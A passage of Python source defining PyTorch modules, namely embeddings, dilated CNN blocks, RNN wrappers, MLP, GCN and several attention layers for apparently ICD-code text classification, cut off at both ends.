TextEmbedding(nn.Module):\n def __init__(self, embedding, dropout=0.3, freeze=False, name='textEmbedding'):\n super(TextEmbedding, self).__init__()\n self.name = name\n self.embedding = nn.Embedding.from_pretrained(torch.tensor(embedding,dtype=torch.float32), freeze=freeze)\n self.dropout1 = nn.Dropout2d(p=dropout/2)\n self.dropout2 = nn.Dropout(p=dropout/2)\n self.p = dropout\n def forward(self, x):\n # x: batchSize × seqLen\n if self.p>0:\n x = self.dropout2(self.dropout1(self.embedding(x)))\n else:\n x = self.embedding(x)\n return x\n\nclass TextEmbedding_1d(nn.Module):\n def __init__(self, embedding, dropout=0.3, freeze=False, name='textEmbedding'):\n super(TextEmbedding_1d, self).__init__()\n self.name = name\n self.embedding = nn.Embedding.from_pretrained(torch.tensor(embedding,dtype=torch.float32), freeze=freeze)\n # self.dropout1 = nn.Dropout2d(p=dropout/2)\n self.dropout = nn.Dropout(p=dropout/2)\n def forward(self, x):\n return self.dropout(self.embedding(x))\n\n\n \nclass ResDilaCNNBlock(nn.Module):\n def __init__(self, dilaSize, filterSize=64, dropout=0.15, name='ResDilaCNNBlock'):\n super(ResDilaCNNBlock, self).__init__()\n self.layers = nn.Sequential(\n nn.ELU(),\n nn.Conv1d(filterSize,filterSize,kernel_size=3,padding=dilaSize,dilation=dilaSize),\n nn.InstanceNorm1d(filterSize),\n nn.ELU(),\n nn.Dropout(dropout),\n nn.Conv1d(filterSize,filterSize,kernel_size=3,padding=dilaSize,dilation=dilaSize),\n nn.InstanceNorm1d(filterSize),\n )\n self.name = name\n def forward(self, x):\n # x: batchSize × filterSize × seqLen\n return x + self.layers(x)\n\nclass ResDilaCNNBlocks(nn.Module):\n def __init__(self, feaSize, filterSize, blockNum=10, dilaSizeList=[1,2,4,8,16], dropout=0.15, name='ResDilaCNNBlocks'):\n super(ResDilaCNNBlocks, self).__init__()\n self.blockLayers = nn.Sequential()\n self.linear = nn.Linear(feaSize,filterSize)\n for i in range(blockNum):\n self.blockLayers.add_module(f\"ResDilaCNNBlock{i}\", ResDilaCNNBlock(dilaSizeList[i%len(dilaSizeList)],filterSize,dropout=dropout))\n self.name = name\n def forward(self, x):\n # x: batchSize × seqLen × feaSize\n x = self.linear(x) # => batchSize × seqLen × 
filterSize\n x = self.blockLayers(x.transpose(1,2)).transpose(1,2) # => batchSize × seqLen × filterSize\n return F.elu(x) # => batchSize × seqLen × filterSize\n\nclass BatchNorm1d(nn.Module):\n def __init__(self, inSize, name='batchNorm1d'):\n super(BatchNorm1d, self).__init__()\n self.bn = nn.BatchNorm1d(inSize)\n self.name = name\n def forward(self, x):\n return self.bn(x)\n\n# class TextCNN(nn.Module):\n# def __init__(self, featureSize, filterSize, contextSizeList, reduction='pool', actFunc=nn.ReLU, bn=False, name='textCNN'):\n# super(TextCNN, self).__init__()\n# moduleList = []\n# for i in range(len(contextSizeList)):\n# moduleList.append(\n# nn.Conv1d(in_channels=featureSize, out_channels=filterSize, kernel_size=contextSizeList[i], padding=contextSizeList[i]//2),\n# )\n# self.actFunc = actFunc()\n# self.conv1dList = nn.ModuleList(moduleList)\n# self.reduction = reduction\n# self.batcnNorm = nn.BatchNorm1d(filterSize)\n# self.bn = bn\n# self.name = name\n# def forward(self, x):\n# # x: batchSize × seqLen × feaSize\n# x = x.transpose(1,2) # => batchSize × feaSize × seqLen\n# x = [conv(x).transpose(1,2) for conv in self.conv1dList] # => scaleNum * (batchSize × seqLen × filterSize)\n\n# if self.bn:\n# x = [self.batcnNorm(i) for i in x]\n# x = [self.actFunc(i) for i in x]\n\n# if self.reduction=='pool':\n# x = [F.adaptive_max_pool1d(i.transpose(1,2), 1).squeeze(dim=2) for i in x]\n# return torch.cat(x, dim=1) # => batchSize × scaleNum*filterSize\n# elif self.reduction=='cpool':\n# x = torch.cat([i.unsqueeze(dim=3) for i in x], dim=3)\n# return torch.max(x, 3)[0] # => batchSize × seqLen × filterSize\n# elif self.reduction=='none':\n# return x # => scaleNum * (batchSize × seqLen × filterSize)\n\n# 使用Tanh激活\nclass TextCNN(nn.Module):\n def __init__(self, featureSize, filterSize, contextSizeList, reduction='pool', actFunc=nn.ReLU, bn=False, name='textCNN'):\n super(TextCNN, self).__init__()\n moduleList = []\n for i in range(len(contextSizeList)):\n moduleList.append(\n nn.Conv1d(in_channels=featureSize, out_channels=filterSize, kernel_size=contextSizeList[i], padding=contextSizeList[i]//2),\n )\n # self.actFunc = actFunc()\n self.conv1dList = nn.ModuleList(moduleList)\n self.reduction = reduction\n self.batcnNorm = nn.BatchNorm1d(filterSize)\n self.bn = bn\n self.name = name\n def forward(self, x):\n # x: batchSize × seqLen × feaSize\n x = x.transpose(1,2) # => batchSize × feaSize × seqLen\n x = [conv(x).transpose(1,2) for conv in self.conv1dList] # => scaleNum * (batchSize × seqLen × filterSize)\n\n if self.bn:\n x = [self.batcnNorm(i) for i in x]\n x = [F.tanh(i) for i in x]\n\n if self.reduction=='pool':\n x = [F.adaptive_max_pool1d(i.transpose(1,2), 1).squeeze(dim=2) for i in x]\n return torch.cat(x, dim=1) # => batchSize × scaleNum*filterSize\n elif self.reduction=='cpool':\n x = torch.cat([i.unsqueeze(dim=3) for i in x], dim=3)\n return torch.max(x, 3)[0] # => batchSize × seqLen × filterSize\n elif self.reduction=='none':\n return x # => scaleNum * (batchSize × seqLen × filterSize)\n\nclass TextLSTM(nn.Module):\n def __init__(self, feaSize, hiddenSize, num_layers=1, dropout=0.0, bidirectional=True, name='textBiLSTM'):\n super(TextLSTM, self).__init__()\n self.name = name\n self.biLSTM = nn.LSTM(feaSize, hiddenSize, bidirectional=bidirectional, batch_first=True, num_layers=num_layers, dropout=dropout)\n\n def forward(self, x, xlen=None):\n # x: batchSizeh × seqLen × feaSize\n if xlen is not None:\n xlen, indices = torch.sort(xlen, descending=True)\n _, desortedIndices = 
torch.sort(indices, descending=False)\n\n x = nn.utils.rnn.pack_padded_sequence(x[indices], xlen, batch_first=True)\n output, hn = self.biLSTM(x) # output: batchSize × seqLen × hiddenSize*2; hn: numLayers*2 × batchSize × hiddenSize\n if xlen is not None:\n output, _ = nn.utils.rnn.pad_packed_sequence(output, batch_first=True)\n return output[desortedIndices]\n return output # output: batchSize × seqLen × hiddenSize*2\n def orthogonalize_gate(self):\n nn.init.orthogonal_(self.biLSTM.weight_ih_l0)\n nn.init.orthogonal_(self.biLSTM.weight_hh_l0)\n nn.init.ones_(self.biLSTM.bias_ih_l0)\n nn.init.ones_(self.biLSTM.bias_hh_l0)\n\nclass TextGRU(nn.Module):\n def __init__(self, feaSize, hiddenSize, num_layers=1, dropout=0.0, bidirectional=True, name='textBiGRU'):\n super(TextGRU, self).__init__()\n self.name = name\n self.biGRU = nn.GRU(feaSize, hiddenSize, bidirectional=bidirectional, batch_first=True, num_layers=num_layers, dropout=dropout)\n\n def forward(self, x, xlen=None):\n # x: batchSizeh × seqLen × feaSize\n if xlen is not None:\n xlen, indices = torch.sort(xlen, descending=True)\n _, desortedIndices = torch.sort(indices, descending=False)\n\n x = nn.utils.rnn.pack_padded_sequence(x[indices], xlen, batch_first=True)\n output, hn = self.biGRU(x) # output: batchSize × seqLen × hiddenSize*2; hn: numLayers*2 × batchSize × hiddenSize\n if xlen is not None:\n output, _ = nn.utils.rnn.pad_packed_sequence(output, batch_first=True)\n return output[desortedIndices]\n\n return output # output: batchSize × seqLen × hiddenSize*2\n\nclass FastText(nn.Module):\n def __init__(self, feaSize, name='fastText'):\n super(FastText, self).__init__()\n self.name = name\n def forward(self, x, xLen):\n # x: batchSize × seqLen × feaSize; xLen: batchSize\n x = torch.sum(x, dim=1) / xLen.float().view(-1,1)\n return x\n\nclass MLP(nn.Module):\n def __init__(self, inSize, outSize, hiddenList=[], dropout=0.0, bnEveryLayer=False, dpEveryLayer=False, outBn=False, outAct=False, outDp=False, name='MLP', actFunc=nn.ReLU):\n super(MLP, self).__init__()\n self.name = name\n hiddens,bns = [],[]\n for i,os in enumerate(hiddenList):\n hiddens.append( nn.Sequential(\n nn.Linear(inSize, os),\n ) )\n bns.append(nn.BatchNorm1d(os))\n inSize = os\n bns.append(nn.BatchNorm1d(outSize))\n self.actFunc = actFunc()\n self.dropout = nn.Dropout(p=dropout)\n self.hiddens = nn.ModuleList(hiddens)\n self.bns = nn.ModuleList(bns)\n self.out = nn.Linear(inSize, outSize)\n self.bnEveryLayer = bnEveryLayer\n self.dpEveryLayer = dpEveryLayer\n self.outBn = outBn\n self.outAct = outAct\n self.outDp = outDp\n def forward(self, x):\n for h,bn in zip(self.hiddens,self.bns):\n x = h(x)\n if self.bnEveryLayer:\n if len(x.shape)==3:\n x = bn(x.transpose(1,2)).transpose(1,2)\n else:\n x = bn(x)\n x = self.actFunc(x)\n if self.dpEveryLayer:\n x = self.dropout(x)\n x = self.out(x)\n if self.outBn: x = self.bns[-1](x)\n if self.outAct: x = self.actFunc(x)\n if self.outDp: x = self.dropout(x)\n return x\n\nclass GCN(nn.Module):\n def __init__(self, inSize, outSize, hiddenSizeList=[], dropout=0.0, bnEveryLayer=False, dpEveryLayer=False, outBn=False, outAct=False, outDp=False, resnet=False, name='GCN', actFunc=nn.ReLU):\n super(GCN, self).__init__()\n self.name = name\n hiddens,bns = [],[]\n for i,os in enumerate(hiddenSizeList):\n hiddens.append(nn.Sequential(\n nn.Linear(inSize, os),\n ) )\n bns.append(nn.BatchNorm1d(os))\n inSize = os\n bns.append(nn.BatchNorm1d(outSize))\n self.actFunc = actFunc()\n self.dropout = nn.Dropout(p=dropout)\n self.hiddens = 
nn.ModuleList(hiddens)\n self.bns = nn.ModuleList(bns)\n self.out = nn.Linear(inSize, outSize)\n self.bnEveryLayer = bnEveryLayer\n self.dpEveryLayer = dpEveryLayer\n self.outBn = outBn\n self.outAct = outAct\n self.outDp = outDp\n self.resnet = resnet\n def forward(self, x, L):\n # x: nodeNum × feaSize; L: batchSize × nodeNum × nodeNum\n for h,bn in zip(self.hiddens,self.bns):\n a = h(torch.matmul(L,x)) # => batchSize × nodeNum × os\n if self.bnEveryLayer:\n if len(L.shape)==3:\n a = bn(a.transpose(1,2)).transpose(1,2)\n else:\n a = bn(a)\n a = self.actFunc(a)\n if self.dpEveryLayer:\n a = self.dropout(a)\n if self.resnet and a.shape==x.shape:\n a += x\n x = a\n a = self.out(torch.matmul(L, x)) # => batchSize × nodeNum × outSize\n if self.outBn:\n if len(L.shape)==3:\n a = self.bns[-1](a.transpose(1,2)).transpose(1,2)\n else:\n a = self.bns[-1](a)\n if self.outAct: a = self.actFunc(a)\n if self.outDp: a = self.dropout(a)\n if self.resnet and a.shape==x.shape:\n a += x\n x = a\n return x\n\nclass TextAttention(nn.Module):\n def __init__(self, method, name='textAttention'):\n super(TextAttention, self).__init__()\n self.attn = LuongAttention(method)\n self.name = name\n def forward(self, sequence, reference):\n # sequence: batchSize × seqLen × feaSize; reference: batchSize × classNum × feaSize\n alpha = self.attn(reference, sequence) # => batchSize × classNum × seqLen\n return torch.matmul(alpha, sequence) # => batchSize × classNum × feaSize\n\nclass ICDAttention(nn.Module):\n def __init__(self, inSize, classNum, transpose=False, name='ICDAttention'):\n super(ICDAttention, self).__init__()\n self.transpose = transpose\n self.U = nn.Linear(inSize, classNum)\n self.name = name\n def forward(self, X):\n # X: batchSize × seqLen × inSize\n alpha = F.softmax(self.U(X), dim=1) # => batchSize × seqLen × classNum\n X = torch.matmul(X.transpose(1,2), alpha) # => batchSize × inSize × classNum\n return X.transpose(1,2)\n\nclass LAATAttention(nn.Module):\n def __init__(self, inSize, classNum,d_a, transpose=False, name='LAATAttention'):\n super(LAATAttention, self).__init__()\n self.transpose = transpose\n self.first_linears = nn.Linear(inSize, d_a)\n self.U = nn.Linear(d_a, classNum)\n self.name = name\n def forward(self, X):\n # X: batchSize × seqLen × inSize\n Z = F.tanh(self.first_linears(X))\n alpha = F.softmax(self.U(Z), dim=1) # => batchSize × seqLen × classNum\n X = torch.matmul(X.transpose(1,2), alpha) # => batchSize × inSize × classNum\n return X.transpose(1,2)\n\n# 从Linear的weight里面取 1000个位置的weight\nclass ICDCandiAttention(nn.Module):\n def __init__(self, inSize, classNum, transpose=False, name='ICDCandiAttention'):\n super(ICDCandiAttention, self).__init__()\n self.transpose = transpose\n self.U = nn.Linear(inSize, classNum)\n self.name = name\n def forward(self, X, candidate):\n # X: batchSize × seqLen × inSize\n batchLabelVec =torch.stack([self.U.weight[candidate[i]] for i in range(len(candidate))], dim=0) # => batchSize × Candidates num(1000) × inSize \n alpha = F.softmax(torch.matmul(X, batchLabelVec.transpose(1,2)), dim=1) # => batchSize × seqLen × Candidates num(1000)\n X = torch.matmul(alpha.transpose(1,2),X) # => batchSize x candidateNum x inSize\n return X\n\nclass DeepICDAttention(nn.Module):\n def __init__(self, inSize, classNum, hdnDropout=0.1, attnList=[], compress=False, name='DeepICDAttn'):\n super(DeepICDAttention, self).__init__()\n hdns,attns,bns = [],[],[]\n if not compress:\n attnList = attnList + [classNum]\n else:\n self.decode = nn.Sequential(\n nn.Linear(attnList[-1], 
classNum),\n nn.BatchNorm1d(inSize),\n nn.ReLU()\n )\n for os in attnList:\n hdns.append(nn.Linear(inSize,inSize))\n attns.append(nn.Linear(inSize,os))\n bns.append(nn.BatchNorm1d(inSize))\n self.hdns = nn.ModuleList(hdns)\n self.attns = nn.ModuleList(attns)\n self.bns = nn.ModuleList(bns)\n self.dropout = nn.Dropout(p=hdnDropout)\n self.compress = compress\n self.name = name\n def forward(self, X):\n # X: batchSize × seqLen × inSize\n for h,a,b in zip(self.hdns,self.attns,self.bns):\n alpha = F.softmax(a(X), dim=1) # => batchSize × seqLen × os\n X = torch.matmul(alpha.transpose(1,2), X) # => batchSize × os × inSize\n X = h(X) # => batchSize × os × inSize\n X = b(X.transpose(1,2)).transpose(1,2) # => batchSize × os × inSize\n X = F.relu(X) # => batchSize × os × inSize\n X = self.dropout(X) # => batchSize × os × inSize\n if self.compress:\n X = self.decode(X.transpose(1,2)).transpose(1,2)\n # => batchSize × classNum × inSize\n return X\n\nclass DeepICDDescAttention(nn.Module):\n def __init__(self, inSize, classNum, labSize=1024, hdnDropout=0.1, attnList=[], labDescVec=None, name='DeepICDAttn'):\n super(DeepICDDescAttention, self).__init__()\n hdns,attns,bns = [],[],[]\n for i,os in enumerate(attnList):\n attns.append(nn.Linear(inSize,os))\n if i==len(attnList)-1:\n hdns.append(nn.Linear(inSize, labSize))\n inSize = labSize\n else:\n hdns.append(nn.Linear(inSize,inSize))\n bns.append(nn.BatchNorm1d(inSize))\n self.hdns = nn.ModuleList(hdns)\n self.attns = nn.ModuleList(attns)\n self.bns = nn.ModuleList(bns)\n self.dropout = nn.Dropout(p=hdnDropout)\n self.labDescVec = nn.Parameter(torch.tensor(labDescVec, dtype=torch.float32)) if labDescVec is not None else None\n self.name = name\n def forward(self, X, labDescVec=None):\n if labDescVec is None:\n labDescVec = self.labDescVec\n # X: batchSize × seqLen × inSize\n for h,a,b in zip(self.hdns,self.attns,self.bns):\n alpha = F.softmax(a(X), dim=1) # => batchSize × seqLen × os\n X = torch.matmul(alpha.transpose(1,2), X) # => batchSize × os × inSize\n X = h(X) # => batchSize × os × inSize\n X = b(X.transpose(1,2)).transpose(1,2) # => batchSize × os × inSize\n X = F.relu(X) # => batchSize × os × inSize\n X = self.dropout(X) # => batchSize × os × inSize\n # X => batchSize × os × icdSize labDescVec => icdSize × 1000\n alpha = F.softmax(torch.matmul(X, labDescVec.transpose(0,1)), dim=1) # => batchSize × os × classNum\n X = torch.matmul(alpha.transpose(1,2), X) # => batchSize × classNum × inSize\n return X\n\nclass DeepICDDescCandiAttention(nn.Module):\n def __init__(self, inSize, classNum, labSize=1024, hdnDropout=0.1, attnList=[], labDescVec=None, name='DeepICDDescCandiAttention'):\n super(DeepICDDescCandiAttention, self).__init__()\n hdns,attns,bns = [],[],[]\n for i,os in enumerate(attnList):\n attns.append(nn.Linear(inSize,os))\n if i==len(attnList)-1:\n hdns.append(nn.Linear(inSize, labSize))\n inSize = labSize\n else:\n hdns.append(nn.Linear(inSize,inSize))\n bns.append(nn.BatchNorm1d(inSize))\n self.hdns = nn.ModuleList(hdns)\n self.attns = nn.ModuleList(attns)\n self.bns = nn.ModuleList(bns)\n self.dropout = nn.Dropout(p=hdnDropout)\n self.labDescVec = nn.Parameter(torch.tensor(labDescVec, dtype=torch.float32)) if labDescVec is not None else None\n self.name = name\n def forward(self, X, candidate, labDescVec=None):\n if labDescVec is None: \n labDescVec = self.labDescVec\n # X: batchSize × seqLen × inSize\n # labDescVec: Class num × 1024 tensor\n # 拿到当前batch 对应的candidates np.array 索引\n for h,a,b in zip(self.hdns,self.attns,self.bns):\n alpha = 
F.softmax(a(X), dim=1) # => batchSize × seqLen × os\n X = torch.matmul(alpha.transpose(1,2), X) # => batchSize × os × inSize\n X = h(X) # => batchSize × os × inSize\n X = b(X.transpose(1,2)).transpose(1,2) # => batchSize × os × inSize\n X = F.relu(X) # => batchSize × os × inSize\n X = self.dropout(X) # => batchSize × os × inSize\n # => batchSize × os × icdSize\n # 根据Candidates 取出 每个batch对应的标签矩阵 batchSize × 1000 × 1024\n # 源: labDescVec: Class num × 1024 np.array 二维\n # 目标: batchSize x 1000 x1024 三维(二维concat)\n batchLabelVec =torch.stack([labDescVec[candidate[i]] for i in range(len(candidate))], dim=0) # => batchSize × Candidates num(1000) × 1024\n alpha = F.softmax(torch.matmul(X, batchLabelVec.transpose(1,2)), dim=1) # => batchSize × os × Candidates num(1000)\n X = torch.matmul(alpha.transpose(1,2), X) # => batchSize × Candidates num(1000) × inSize\n return X\n \nclass LuongAttention(nn.Module):\n def __init__(self, method):\n super(LuongAttention, self).__init__()\n self.method = method\n def dot_score(self, hidden, encoderOutput):\n # hidden: batchSize × classNum × hiddenSize; encoderOutput: batchSize × seq_len × hiddenSize\n return torch.matmul(encoderOutput, hidden.transpose(-1,-2)) # => batchSize × seq_len × classNum\n def forward(self, hidden, encoderOutput):\n attentionScore = self.dot_score(hidden, encoderOutput).transpose(-1,-2)\n # attentionScore: batchSize × classNum × seq_len\n return F.softmax(attentionScore, dim=-1) # => batchSize × classNum × seq_len\n\nclass SimpleAttention(nn.Module):\n def __init__(self, inSize, actFunc=nn.Tanh(), name='SimpleAttention'):\n super(SimpleAttention, self).__init__()\n self.name = name\n self.W = nn.Linear(inSize, int(inSize//2))\n self.U = nn.Linear(int(inSize//2), 1)\n self.actFunc = actFunc\n def forward(self, input):\n # input: batchSize × seqLen × inSize\n x = self.W(input) # => batchSize × seqLen × inSize//2\n H = self.actFunc(x) # => batchSize × seqLen × inSize//2\n alpha = F.softmax(self.U(H), dim=1) # => batchSize × seqLen × 1\n return self.actFunc( torch.matmul(input.transpose(1,2), alpha).squeeze(2) ) # => batchSize × inSize\n\nclass KnowledgeAttention(nn.Module):\n def __init__(self, noteFeaSize, titleFeaSize, name='knowledgeAttention'):\n super(KnowledgeAttention, self).__init__()\n self.linear = nn.Sequential(\n nn.Linear(noteFeaSize, titleFeaSize),\n nn.Tanh()\n )\n self.labWeight = None\n self.name = name\n def forward(self, noteConved, titleEncoded):\n # noteConved: batchSize × noteFeaSize; titleEncoded: titleNum × titleFeaSize\n x = self.linear(noteConved) # => batchSize × titleFeaSize\n attnWeight = F.softmax(torch.matmul(x, titleEncoded.transpose(0,1)), dim=1) # => batchSize × titleNum\n self.labWeight = attnWeight.detach().cpu().numpy()\n return torch.matmul(attnWeight, titleEncoded) # => batchSize × titleFeaSize\n\nclass InterationAttention(nn.Module):\n def __init__(self, feaSize1, feaSize2, dropout=0.0, attnType='poolAttn', name='interAttn'):\n super(InterationAttention, self).__init__()\n self.attnFunc = {'poolAttn':self.pooling_attention,\n 'poolAttn_s':self.pooling_attention_s,\n 'catSimAttn':self.concat_simple_attention,\n 'plaAttn':self.plane_attention,\n 'plaAttn_s':self.plane_attention_s}\n assert attnType in self.attnFunc.keys()\n self.name = name\n self.U = nn.Linear(feaSize1, feaSize2)\n self.W = nn.Linear(feaSize2, 1)\n self.simpleAttn1 = SimpleAttention(feaSize1+feaSize2)\n self.simpleAttn2 = SimpleAttention(feaSize1+feaSize2)\n self.feaSize1,self.feaSize2 = feaSize1,feaSize2\n self.attnType = attnType\n 
self.dropout = nn.Dropout(dropout)\n\n def pooling_attention_s(self, x, y):\n u = self.U(x).unsqueeze(dim=2) # => batchSize × seqLen1 × 1 × feaSize2\n v = y.unsqueeze(dim=1) # => batchSize × 1 × seqLen2 × feaSize2\n alpha = torch.sum(u*v,dim=3) # => batchSize × seqLen1 × seqLen2\n xAlpha,_ = torch.max(alpha, dim=2, keepdim=True) # => batchSize × seqLen1 × 1\n x = torch.matmul(x.transpose(1,2), F.softmax(xAlpha,dim=1)).squeeze(dim=2) # => batchSize × feaSize1\n yAlpha,_ = torch.max(alpha, dim=1, keepdim=True) # => batchSize × 1 × seqLen2\n y = torch.matmul(F.softmax(yAlpha,dim=2), y).squeeze(dim=1) # => batchSize × feaSize2\n return torch.cat([x,y], dim=1) # => batchSize × (feaSize1+feaSize2)\n\n def pooling_attention(self, x, y):\n u = self.U(x).unsqueeze(dim=2) # => batchSize × seqLen1 × 1 × feaSize2\n v = y.unsqueeze(dim=1) # => batchSize × 1 × seqLen2 × feaSize2\n alpha = F.tanh(u*v) # => batchSize × seqLen1 × seqLen2 × feaSize2\n alpha = self.W(alpha).squeeze(dim=3) # => batchSize × seqLen1 × seqLen2\n xAlpha,_ = torch.max(alpha, dim=2, keepdim=True) # => batchSize × seqLen1 × 1\n x = torch.matmul(x.transpose(1,2), F.softmax(xAlpha,dim=1)).squeeze(dim=2) # => batchSize × feaSize1\n yAlpha,_ = torch.max(alpha, dim=1, keepdim=True) # => batchSize × 1 × seqLen2\n y = torch.matmul(F.softmax(yAlpha,dim=2), y).squeeze(dim=1) # => batchSize × feaSize2\n return torch.cat([x,y], dim=1) # => batchSize × (feaSize1+feaSize2)\n\n def concat_simple_attention(self, x, y):\n x_pooled,_ = torch.max(x, dim=1) # => batchSize × feaSize1\n y_pooled,_ = torch.max(y, dim=1) # => batchSize × feaSize2\n u = torch.cat([x, y_pooled.unsqueeze(dim=1).expand(-1,x.shape[1],-1)], dim=2) # => batchSize × seqLen1 × (feaSize1+feaSize2)\n v = torch.cat([y, x_pooled.unsqueeze(dim=1).expand(-1,y.shape[1],-1)], dim=2) # => batchSize × seqLen2 × (feaSize1+feaSize2)\n x,y = self.simpleAttn1(u)[:,:self.feaSize1],self.simpleAttn2(v)[:,:self.feaSize2]\n return torch.cat([x,y], dim=1) # => batchSize × (feaSize1+feaSize2)\n\n def plane_attention_s(self, x, y):\n u = self.U(x).unsqueeze(dim=2) # => batchSize × seqLen1 × 1 × feaSize2\n v = y.unsqueeze(dim=1) # => batchSize × 1 × seqLen2 × feaSize2\n alpha = torch.sum(u*v,dim=3) # => batchSize × seqLen1 × seqLen2\n alpha = F.softmax(alpha.flatten(1,2),dim=1).unsqueeze(dim=1) # => batchSize × 1 × seqLen1*seqLen2\n\n x,y = x.unsqueeze(dim=2).expand(-1,-1,y.shape[1],-1),y.unsqueeze(dim=1).expand(-1,x.shape[1],-1,-1) # => batchSize × seqLen1 × seqLen2 × feaSize\n xy = torch.cat([x,y], dim=3).flatten(1,2) # => batchSize × seqLen1*seqLen2 × (feaSize1+feaSize2)\n return torch.matmul(alpha, xy).squeeze(dim=1) # => batchSize × (feaSize1+feaSize2)\n\n def plane_attention(self, x, y):\n u = self.U(x).unsqueeze(dim=2) # => batchSize × seqLen1 × 1 × feaSize2\n v = y.unsqueeze(dim=1) # => batchSize × 1 × seqLen2 × feaSize2\n alpha = F.tanh(u*v) # => batchSize × seqLen1 × seqLen2 × feaSize2\n alpha = self.W(alpha).squeeze(dim=3) # => batchSize × seqLen1 × seqLen2\n alpha = F.softmax(alpha.flatten(1,2),dim=1).unsqueeze(dim=1) # => batchSize × 1 × seqLen1*seqLen2\n\n x,y = x.unsqueeze(dim=2).expand(-1,-1,y.shape[1],-1),y.unsqueeze(dim=1).expand(-1,x.shape[1],-1,-1) # => batchSize × seqLen1 × seqLen2 × feaSize\n xy = torch.cat([x,y], dim=3).flatten(1,2) # => batchSize × seqLen1*seqLen2 × (feaSize1+feaSize2)\n return torch.matmul(alpha, xy).squeeze(dim=1) # => batchSize × (feaSize1+feaSize2)\n\n def forward(self, x, y):\n # x: batchSize × seqLen1 × feaSize1; y: batchSize × seqLen2 × feaSize2\n return 
self.dropout(self.attnFunc[self.attnType](x,y)) # => batchSize × (feaSize1+feaSize2)\n\nclass SelfAttention(nn.Module):\n def __init__(self, featureSize, dk, multiNum, name='selfAttn'):\n super(SelfAttention, self).__init__()\n self.dk = dk\n self.multiNum = multiNum\n self.WQ = nn.ModuleList([nn.Linear(featureSize, self.dk) for i in range(multiNum)])\n self.WK = nn.ModuleList([nn.Linear(featureSize, self.dk) for i in range(multiNum)])\n self.WV = nn.ModuleList([nn.Linear(featureSize, self.dk) for i in range(multiNum)])\n self.WO = nn.Linear(self.dk*multiNum, featureSize)\n self.name = name\n def forward(self, x, xlen=None):\n # x: batchSize × seqLen × feaSize; xlen: batchSize\n queries = [self.WQ[i](x) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × dk)\n keys = [self.WK[i](x) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × dk)\n values = [self.WV[i](x) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × dk)\n scores = [torch.bmm(queries[i], keys[i].transpose(1,2))/np.sqrt(self.dk) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × seqLen)\n # mask padding\n if xlen is not None:\n for i in range(len(scores)):\n mask = torch.zeros(scores[0].shape, dtype=torch.float32, device=scores[i].device) # => batchSize × seqLen × seqLen\n for j,k in enumerate(xlen):\n mask[j,:,k-1:] -= 999999\n scores[i] = scores[i] + mask\n z = [torch.bmm(F.softmax(scores[i], dim=2), values[i]) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × dk)\n z = self.WO(torch.cat(z, dim=2)) # => batchSize × seqLen × feaSize\n return z\n\nclass LayerNormAndDropout(nn.Module):\n def __init__(self, feaSize, dropout=0.1, name='layerNormAndDropout'):\n super(LayerNormAndDropout, self).__init__()\n self.layerNorm = nn.LayerNorm(feaSize)\n self.dropout = nn.Dropout(p=dropout)\n self.name = name\n def forward(self, x):\n return self.dropout(self.layerNorm(x))\n\nclass SimpleSelfAttention(nn.Module):\n def __init__(self, feaSize, name='simpleSelfAttn'):\n super(SimpleSelfAttention, self).__init__()\n self.feaSize = feaSize\n self.WO = nn.Linear(feaSize, feaSize)\n self.name = name\n def forward(self, x, xlen=None):\n # x: batchSize × seqLen × feaSize; xlen: batchSize\n querie = x # => batchSize × seqLen × feaSize\n key = x # => batchSize × seqLen × feaSize\n value = x # => batchSize × seqLen × feaSize\n score = torch.bmm(querie, key.transpose(1,2))/np.sqrt(self.feaSize) # => batchSize × seqLen × seqLen\n # mask padding\n if xlen is not None:\n mask = torch.zeros(score.shape, dtype=torch.float32, device=score.device) # => batchSize × seqLen × seqLen\n for j,k in enumerate(xlen):\n mask[j,:,k-1:] -= 999999\n score = score + mask\n z = torch.bmm(F.softmax(score, dim=2), value) # => batchSize × seqLen × feaSize\n z = self.WO(z) # => batchSize × seqLen × feaSize\n return z\n\nclass ResidualBlock(nn.Module):\n def __init__(self, inchannel, outchannel, kernel_size, stride, use_res, dropout):\n super(ResidualBlock, self).__init__()\n self.left = nn.Sequential(\n nn.Conv1d(inchannel, outchannel, kernel_size=kernel_size, stride=stride, padding=int(floor(kernel_size / 2)), bias=False),\n nn.BatchNorm1d(outchannel),\n nn.Tanh(),\n nn.Conv1d(outchannel, outchannel, kernel_size=kernel_size, stride=1, padding=int(floor(kernel_size / 2)), bias=False),\n nn.BatchNorm1d(outchannel)\n )\n\n self.use_res = use_res\n if self.use_res:\n self.shortcut = nn.Sequential(\n nn.Conv1d(inchannel, outchannel, kernel_size=1, stride=stride, bias=False),\n 
nn.BatchNorm1d(outchannel)\n )\n\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, x):\n out = self.left(x)\n if self.use_res:\n out += self.shortcut(x)\n out = torch.tanh(out)\n out = self.dropout(out)\n return out\n\nclass FFN(nn.Module):\n def __init__(self, featureSize, dropout=0.1, name='FFN'):\n super(FFN, self).__init__()\n self.layerNorm1 = nn.LayerNorm(featureSize)\n self.layerNorm2 = nn.LayerNorm(featureSize)\n self.Wffn = nn.Sequential(\n nn.Linear(featureSize, featureSize*4), \n nn.ReLU(),\n nn.Linear(featureSize*4, featureSize)\n )\n self.dropout = nn.Dropout(p=dropout)\n self.name = name\n def forward(self, x, z):\n z = x + self.dropout(self.layerNorm1(z)) # => batchSize × seqLen × feaSize\n ffnx = self.Wffn(z) # => batchSize × seqLen × feaSize\n return z+self.dropout(self.layerNorm2(ffnx)) # => batchSize × seqLen × feaSize\n\nclass Transformer(nn.Module):\n def __init__(self, featureSize, dk, multiNum, dropout=0.1):\n super(Transformer, self).__init__()\n self.selfAttn = SelfAttention(featureSize, dk, multiNum)\n self.ffn = FFN(featureSize, dropout)\n\n def forward(self, input):\n x, xlen = input\n # x: batchSize × seqLen × feaSize; xlen: batchSize\n z = self.selfAttn(x, xlen) # => batchSize × seqLen × feaSize\n return (self.ffn(x, z),xlen) # => batchSize × seqLen × feaSize\n \nclass TextTransformer(nn.Module):\n def __init__(self, seqMaxLen, layersNum, featureSize, dk, multiNum, dropout=0.1, name='textTransformer'):\n super(TextTransformer, self).__init__()\n posEmb = [[np.sin(pos/10000**(2*i/featureSize)) if i%2==0 else np.cos(pos/10000**(2*i/featureSize)) for i in range(featureSize)] for pos in range(seqMaxLen)]\n self.posEmb = 